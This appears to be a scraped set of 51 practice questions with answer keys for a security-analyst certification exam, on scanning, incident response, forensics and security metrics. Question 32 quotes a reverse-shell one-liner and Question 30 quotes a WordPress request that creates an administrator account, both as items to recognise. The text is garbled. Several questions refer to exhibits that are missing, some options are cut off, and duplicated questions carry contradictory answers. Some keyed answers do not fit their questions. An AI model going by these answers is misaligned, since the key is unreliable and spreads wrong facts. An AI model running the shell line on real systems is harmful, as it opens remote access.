Question #1
The security team reviews a web server for XSS and runs the following Nmap scan:
Which of the following most accurately describes the result of the scan?
A. An output of characters > and " as the parameters used in the attempt
B. The vulnerable parameter ID http://172
C. The vulnerable parameter and unfiltered or encoded characters passed > and " as unsafe
D. The vulnerable parameter and characters > and " with a reflected XSS attempt
Correct answer: D
Question #2
A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?
A. Credentialed network scanning
B. Passive scanning
C. Agent-based scanning
D. Dynamic scanning
Correct answer: C
Question #3
An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?
A. CDN
B. Vulnerability scanner
C. DNS
D. Web server
Correct answer: C
Question #4
A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?
A. External
B. Agent-based
C. Non-credentialed
D. Credentialed
Correct answer: B
Question #5
A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?
A. The current scanners should be migrated to the cloud
B. Cloud-specific misconfigurations may not be detected by the current scanners
C. Existing vulnerability scanners cannot scan IaaS systems
D. Vulnerability scans on cloud environments should be performed from the cloud
Correct answer: B
Question #6
A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the following should the team create to address this issue?
A. Service-level agreement
B. Change management plan
C. Incident response plan
D. Memorandum of understanding
Correct answer: C
Question #7
An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?
A. Hard disk
B. Primary boot partition
C. Malicious files
D. Routing table
E. Static IP address
Correct answer: D
Question #8
A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is the most likely cause of the server issue?
A. The server was configured to use SSL to securely transmit data
B. The server was supporting weak TLS protocols for client connections
C. The malware infected all the web servers in the pool
D. The digital certificate on the web server was self-signed
Correct answer: D
Question #9
A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability:
Which of the following log entries provides evidence of the attempted exploit?
A. Log entry 1
B. Log entry 2
C. Log entry 3
D. Log entry 4
Correct answer: A
Question #10
A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the spread of malware that enters the network. Which of the following metrics should the team lead include in the briefs?
A. Mean time between failures
B. Mean time to detect
C. Mean time to remediate
D. Mean time to contain
Correct answer: D
Question #11
A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?
A. Geoblock the offending source country
B. Block the IP range of the scans at the network firewall
C. Perform a historical trend analysis and look for similar scanning activity
D. Block the specific IP address of the scans at the network firewall
Correct answer: B
Question #12
Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?
A. Command and control
B. Actions on objectives
C. Exploitation
D. Delivery
Correct answer: A
Question #13
An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned. Which of the following is the most likely reason to include lessons learned?
A. To satisfy regulatory requirements for incident reporting
B. To hold other departments accountable
C. To identify areas of improvement in the incident response process
D. To highlight the notable practices of the organization's incident response team
Correct answer: C
Question #14
The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?
A. A mean time to remediate of 30 days
B. A mean time to detect of 45 days
C. A mean time to respond of 15 days
D. Third-party application testing
Correct answer: A
Question #15
Patches for two highly exploited vulnerabilities were released on the same Friday afternoon. Information about the systems and vulnerabilities is shown in the tables below:
Which of the following should the security analyst prioritize for remediation?
A. Rogers
B. Brady
C. Brees
D. Manning
Correct answer: B
Question #16
While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?
A. Shut the network down immediately and call the next person in the chain of command
B. Determine what attack the odd characters are indicative of
C. Utilize the correct attack framework and determine what the incident response will consist of
D. Notify the local law enforcement for incident response
Correct answer: B
Question #17
During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?
A. Disk contents
B. Backup data
C. Temporary files
D. Running processes
Correct answer: D
Question #18
A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?
A. function w() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $info" }
B. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }
C. function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo "$1 | $info" }
D. function z() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }
Correct answer: B
Question #19
The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?
A. A mean time to remediate of 30 days
B. A mean time to detect of 45 days
C. A mean time to respond of 15 days
D. Third-party application testing
Correct answer: C
Question #20
An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?
A. Scope
B. Weaponization
C. CVSS
D. Asset value
Correct answer: B
Question #21
An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has: created the initial evidence log; disabled the wireless adapter on the device; interviewed the employee, who was unable to identify the website that was accessed; and reviewed the web proxy traffic logs. Which of the following should the analyst do to remediate the infected device?
A. Update the system firmware and reimage the hardware
B. Install an additional malware scanner that will send email alerts to the analyst
C. Configure the system to use a proxy server for Internet access
D. Delete the user profile and restore data from backup
Correct answer: A
Question #22
A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to categorize and prioritize the respective systems?
A. Interview the users who access these systems
B. Scan the systems to see which vulnerabilities currently exist
C. Configure alerts for vendor-specific zero-day exploits
D. Determine the asset value of each system
Correct answer: D
Question #23
A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, and at other times it is accessible through HTTPS. Which of the following most likely describes the observed activity?
A. There is an issue with the SSL certificate causing port 443 to become unavailable for HTTPS access
B. An on-path attack is being performed by someone with internal access that forces users into port 80
C. The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80
D. An error was caused by BGP due to new rules applied over the company's internal routers
Correct answer: B
Question #24
During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?
A. Clone the virtual server for forensic analysis
B. Log in to the affected server and begin analysis of the logs
C. Restore from the last known-good backup to confirm there was no loss of connectivity
D. Shut down the affected server immediately
Correct answer: A
Question #25
A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that cryptomining is occurring. Which of the following indicators would most likely lead the team to this conclusion?
A. High GPU utilization
B. Bandwidth consumption
C. Unauthorized changes
D. Unusual traffic spikes
Correct answer: A
Question #26
Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?
A. MITRE ATT&CK
B. Cyber Kill Chain
C. OWASP
D. STIX/TAXII
Correct answer: A
Question #27
New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?
A. Human resources must email a copy of a user agreement to all new employees
B. Supervisors must get verbal confirmation from new employees indicating they have read the user agreement
C. All new employees must take a test about the company security policy during the onboarding process
D. All new employees must sign a user agreement to acknowledge the company security policy
Correct answer: D
Question #28
A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?
A. function w() { a=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $a" }
B. function x() { b=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b" }
C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. function z() { c=$(geoiplookup $1) && echo "$1 | $c" }
Correct answer: C
Question #29
A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?
A. Testing
B. Implementation
C. Validation
D. Rollback
Correct answer: C
Question #30
An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet:
/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator
Which of the following controls would work best to mitigate the attack represented by this snippet?
A. Limit user creation to administrators only
B. Limit layout creation to administrators only
C. Set the directory trx_addons to read only for all users
D. Set the directory V2 to read only for all users
Correct answer: A
Question #31
Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
A. Mean time to detect
B. Number of exploits by tactic
C. Alert volume
D. Quantity of intrusion attempts
Correct answer: A
Question #32
A security analyst detects an exploit attempt containing the following command:
sh -i >& /dev/udp/10.1.1.1/4821 0>&1
Which of the following is being attempted?
A. RCE
B. Reverse shell
C. XSS
D. SQL injection
Correct answer: B
Question #33
A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?
A. Upload the binary to an air gapped sandbox for analysis
B. Send the binaries to the antivirus vendor
C. Execute the binaries on an environment with internet connectivity
D. Query the file hashes using VirusTotal
Correct answer: A
Question #34
A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?
A. function w() { a=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $a" }
B. function x() { b=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b" }
C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. function z() { c=$(geoiplookup $1) && echo "$1 | $c" }
Correct answer: C
Question #35
Which of the following would help to minimize human engagement and aid in process improvement in security operations?
A. OSSTMM
B. SIEM
C. SOAR
D. OWASP
Correct answer: C
Question #36
An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?
A. Beaconing
B. Cross-site scripting
C. Buffer overflow
D. PHP traversal
Correct answer: A
Question #37
A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment:
Which of the following should be completed first to remediate the findings?
A. Ask the web development team to update the page contents
B. Add the IP address allow listing for control panel access
C. Purchase an appropriate certificate from a trusted root CA
D. Perform proper sanitization on all fields
Correct answer: D
Question #38
During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?
A. Proprietary systems
B. Legacy systems
C. Unsupported operating systems
D. Lack of maintenance windows
Correct answer: C
Question #39
When starting an investigation, which of the following must be done first?
A. Notify law enforcement
B. Secure the scene
C. Seize all related evidence
D. Interview the witnesses
Correct answer: B
Question #40
Which of the following security operations tasks are ideal for automation?
A. Suspicious file analysis:
   Look for suspicious-looking graphics in a folder
B. Firewall IoC block actions:
   Examine the firewall logs for IoCs from the most recently published zero-day exploit
   Take mitigating actions in the firewall to block the behavior found in the logs
   Follow up on any false positives that were caused by the block rules
C. Security application user errors:
   Search the error logs for signs of users having trouble with the security application
   Look up the user's phone number
   Call the user to help with any questions about using the application
D. Email header analysis:
   Check the email header for a phishing confidence metric greater than or equal to five
   Add the domain of sender to the block list
   Move the email to quarantine
Correct answer: D
Question #41
A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?
A. Change the display filter to ftp
B. Change the display filter to tcp
C. Change the display filter to ftp-data and follow the TCP streams
D. Navigate to the File menu and select FTP from the Export objects option
Correct answer: C
Question #42
An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:
Which of the following tuning recommendations should the security analyst share?
A. Set an HttpOnly flag to force communication by HTTPS
B. Block requests without an X-Frame-Options header
C. Configure an Access-Control-Allow-Origin header to authorized domains
D. Disable the cross-origin resource sharing header
Correct answer: C
Question #43
A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?
A. Geoblock the offending source country
B. Block the IP range of the scans at the network firewall
C. Perform a historical trend analysis and look for similar scanning activity
D. Block the specific IP address of the scans at the network firewall
Correct answer: B
Question #44
A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?
A. Data enrichment
B. Security control plane
C. Threat feed combination
D. Single pane of glass
Correct answer: D
Question #45
Which of the following tools would work best to prevent the exposure of PII outside of an organization?
A. IAM
B. IDS
C. PKI
D. DLP
Correct answer: D
Question #46
A company's security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security team, which of the following groups should the issue be escalated to first in order to comply with industry best practices?
A. Help desk
B. Law enforcement
C. Legal department
D. Board member
Correct answer: C
Question #47
An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?
A. PCI Security Standards Council
B. Local law enforcement
C. Federal law enforcement
D. Card issuer
Correct answer: D
Question #48
A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below:
Security Policy 1006: Vulnerability Management
1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the remediation of security vulnerabilities.
2. In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data.
3. The Com
A. Name: THOR
B. Name: CAP
C. Name: LOKI
D. Name: THANOS
Correct answer: B
Question #49
A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment:
Which of the following should be completed first to remediate the findings?
A. Ask the web development team to update the page contents
B. Add the IP address allow listing for control panel access
C. Purchase an appropriate certificate from a trusted root CA
D. Perform proper sanitization on all fields
Correct answer: C
Question #50
A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?
A. Hacktivist
B. Advanced persistent threat
C. Insider threat
D. Script kiddie
Correct answer: D
Question #51
A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the following is the best method to ensure the data on the device is not modified?
A. Generate a hash value and make a backup image
B. Encrypt the device to ensure confidentiality of the data
C. Protect the device with a complex password
D. Perform a memory scan dump to collect residual data
Correct answer: A
